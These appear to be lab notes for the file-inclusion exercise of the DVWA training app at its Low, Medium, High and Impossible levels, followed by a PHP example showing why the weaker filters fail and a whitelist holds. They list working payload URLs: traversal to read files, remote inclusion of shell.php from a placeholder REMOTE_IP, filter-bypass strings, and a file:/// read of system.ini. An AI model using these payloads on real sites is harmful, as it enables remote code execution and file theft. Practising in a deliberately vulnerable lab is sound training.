DVWA lab
Low
Normal inclusion
http://127.0.0.1//dvwa/vulnerabilities/fi/?page=file1.php
http://127.0.0.1//dvwa/vulnerabilities/fi/?page=file2.php
http://127.0.0.1//dvwa/vulnerabilities/fi/?page=file3.php
Including sensitive files
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../1.txt
Remote inclusion
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://REMOTE_IP/1.txt
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://REMOTE_IP/alert.html
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://REMOTE_IP/shell.php
Medium
Double-write bypass
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=hthttp://tp://ip/alert.html
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=..././..././1.txt
High
file:// protocol
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///C:\Windows\system.ini
Impossible
Whitelist-based inclusion
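
Why the Medium and High checks let the values above through while the Impossible whitelist does not, as an added example (not DVWA's own source). The three filter bodies and the include.php entry are assumptions that model the behaviour these notes observe; the sample values are the ?page= parameters listed above.

```php
<?php
// Added example, not DVWA source: the filter bodies are assumptions that
// model the behaviour these notes observe at each level.

// Medium (assumed): blocked substrings are removed in a single pass.
function medium_filter(string $page): string {
    $page = str_replace(["http://", "https://"], "", $page);
    return str_replace(["../", "..\\"], "", $page);
}

// High (assumed): the name only has to start with "file".
function high_allows(string $page): bool {
    return fnmatch("file*", $page) || $page === "include.php";
}

// Impossible: exact match against a fixed list of page names.
// include.php is an assumed entry; file1-3.php come from the notes.
const ALLOWED_PAGES = ["include.php", "file1.php", "file2.php", "file3.php"];
function whitelist_allows(string $page): bool {
    return in_array($page, ALLOWED_PAGES, true);
}

// ?page= values taken from the notes above.
$samples = [
    'file1.php',
    '../../1.txt',
    'hthttp://tp://ip/alert.html',
    '..././..././1.txt',
    'file:///C:\Windows\system.ini',
];

foreach ($samples as $page) {
    printf("%-32s medium=>%-22s high=%-5s whitelist=%s\n",
        $page,
        medium_filter($page),
        high_allows($page) ? "allow" : "deny",
        whitelist_allows($page) ? "allow" : "deny");
}
```

In the medium column the two double-written values collapse back into http://ip/alert.html and ../../1.txt after the single removal pass; the whitelist column allows only file1.php.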